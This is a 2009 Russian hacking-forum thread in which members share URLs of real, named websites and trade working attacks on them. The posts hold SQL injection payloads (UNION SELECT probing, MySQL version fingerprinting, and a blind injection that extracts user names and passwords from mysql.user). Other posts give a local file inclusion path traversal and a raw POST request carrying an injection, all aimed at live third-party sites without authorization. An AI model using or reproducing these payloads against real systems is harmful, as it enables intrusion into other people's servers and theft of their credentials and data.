21.03.2009, 23:09
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами:
9725544
Репутация:
246
|
|
http://www.oldnewrock.ru/index.php?cont=history&pg=2007-onw&prt=rocktour%27
а тут возможно что то сделать?
Код:
Warning: main(history/2007-onw/inc_rocktour\'.php): failed to open stream: No such file or directory in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36
Warning: main(history/2007-onw/inc_rocktour\'.php): failed to open stream: No such file or directory in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36
Warning: main(): Failed opening 'history/2007-onw/inc_rocktour\'.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36
http://www.smsprogroup.ru/static_page.php?sp=dispatches_private%27
Код:
Warning: require_once(Templates/rus.dispatches_private\'.php) [function.require-once]: failed to open stream: No such file or directory in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66
Fatal error: require_once() [function.require]: Failed opening required 'Templates/rus.dispatches_private\'.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66
http://www.big-home.ru/card.php?id=10'&type=2
даже не пытался 
Последний раз редактировалось S0ulVortex; 21.03.2009 в 23:20..
|
|
|
22.03.2009, 01:24
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
С нами:
10260776
Репутация:
185
|
|
Сообщение от S0ulVortex
http://www.smsprogroup.ru/static_page.php?sp=dispatches_private%27
Код:
Warning: require_once(Templates/rus.dispatches_private\'.php) [function.require-once]: failed to open stream: No such file or directory in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66
Fatal error: require_once() [function.require]: Failed opening required 'Templates/rus.dispatches_private\'.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66
Есть локальный инклуд и SQL-inj
http://www.smsprogroup.ru/news.php?detale=-5%20UNION%20SELECT+1,2,3,4+from+news/*
http://www.smsprogroup.ru/static_page.php?sp=sms/../../../../../../../../www/smsprogr/www/htdocs/index
|
|
|
|
22.03.2009, 00:38
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
С нами:
10260776
Репутация:
185
|
|
Народ, подскажите что за хеш??
c2lkPTIzNTM2JmdpZD0yODMzMA==
Или каким алгоритмом зашифрованно?
===========
Вопрос закрыт, это base64... туплю
Последний раз редактировалось -=Static=-; 22.03.2009 в 00:41..
|
|
|
|
22.03.2009, 11:41
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Код:
http://www.4-dsecurity.com/event.detail.php?EID=6+group+by+7
Груп бай говорит 7.
Код:
http://www.4-dsecurity.com/event.detail.php?EID=6+union+select+1,2,3,4,5,6,7
Юнион почему-то не читает, почему?
Только не надо мне о блиндах. Я знаю, что там есть блинд скуля, но почему в юнионе ошибка?
Код:
http://www.texascitychamber.com/events/detail.php?EID=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
Тут вывода нету. Если минус поставить - пишет Unable to open image. Опять же не надо о блиндах Хочется юнионом вывести, а не посимвольно брутить.
ЗЫ: Если нельзья юнионом - так и скажите =)
Последний раз редактировалось mailbrush; 22.03.2009 в 11:49..
|
|
|
|
22.03.2009, 11:50
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
|
|
Сообщение от mailbrush
Код:
http://www.4-dsecurity.com/event.detail.php?EID=6+group+by+7
Груп бай говорит 7.
Код:
http://www.4-dsecurity.com/event.detail.php?EID=6+union+select+1,2,3,4,5,6,7
Юнион почему-то не читает, почему?
Только не надо мне о блиндах. Я знаю, что там есть блинд скуля, но почему в юнионе ошибка? там юниона нету, т к 3 ветка.
Код:
http://www.4-dsecurity.com/event.detail.php?EID=6+and+substring(version(),1,1)=3/*
Код:
http://www.texascitychamber.com/events/detail.php?EID=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
тут 4 ветка, вывод нашёл, смотри пм =)
Код:
http://www.texascitychamber.com/events/detail.php?EID=1+and+substring(version(),1,1)=4/*
Последний раз редактировалось z00MAN; 22.03.2009 в 12:12..
|
|
|
|
22.03.2009, 12:12
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
В код смотри
http://www.texascitychamber.com/events/detail.php?EID=11111+union+select+version(),2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25
4.1.22-standard
|
|
|
|
22.03.2009, 17:29
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
Есть иньекция, данные передаются постом
_____________________________________________
POST http://www.agilebio.com:80/products_labcal_download.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.agilebio.com
Content-Length: 84
Cookie: PHPSESSID=aeghec9708or5shhuv04kufu11
Connection: Close
Pragma: no-cache
user_id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16/*user_pass=&Submit=Download%21&action=download
_____________________________________________
Подобрал поля, но вывода не вижу, он тут есть?
З.Ы. А get тоже работает вроде
http://www.agilebio.com/products_labcal_download.php?user_id='+union+selec t+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*&user_pass=&Submit=Download%21&action=download
Наверное не могу поставить в id ошибочный параметр?
Пробовал с лимитом (+LIMIT+1,1/*) то же самое.
|
|
|
|
22.03.2009, 18:28
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Imperou$, гетом тоже можно
мор1ров
http://www.agilebio.com/products_labcal_download.php?user_id='+and+if(asci i(substring((select+concat_ws(0x2F,name,password)+ from+mysql.user+limit+0,1),1,1))>1,1,(select+1+uni on+select+3))=1/*&user_pass=&Submit=Download&action=download
|
|
|
|
22.03.2009, 19:15
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
http://www.ukrlib.com.ua/kratko-zl/printzip.php?id=77{вылазит ошибка}&bookid=5{Тут тоже инъекция но без явной ошибки}
ПОмогите правильно оборвать запрос а то вроде все перепробовал (#,{,/*,--,'#,'{,'/*,--,--+,'--+)
|
|
|
|
22.03.2009, 19:21
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами:
9561436
Репутация:
462
|
|
Byrger,
Код:
Warning: file(data/.dat) [function.file]: failed to open stream: No such file or directory in /home/ukrlib/domains/ukrlib.com.ua/public_html/kratko-zl/printzip.php on line 24
ошибка с mysql не связана.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
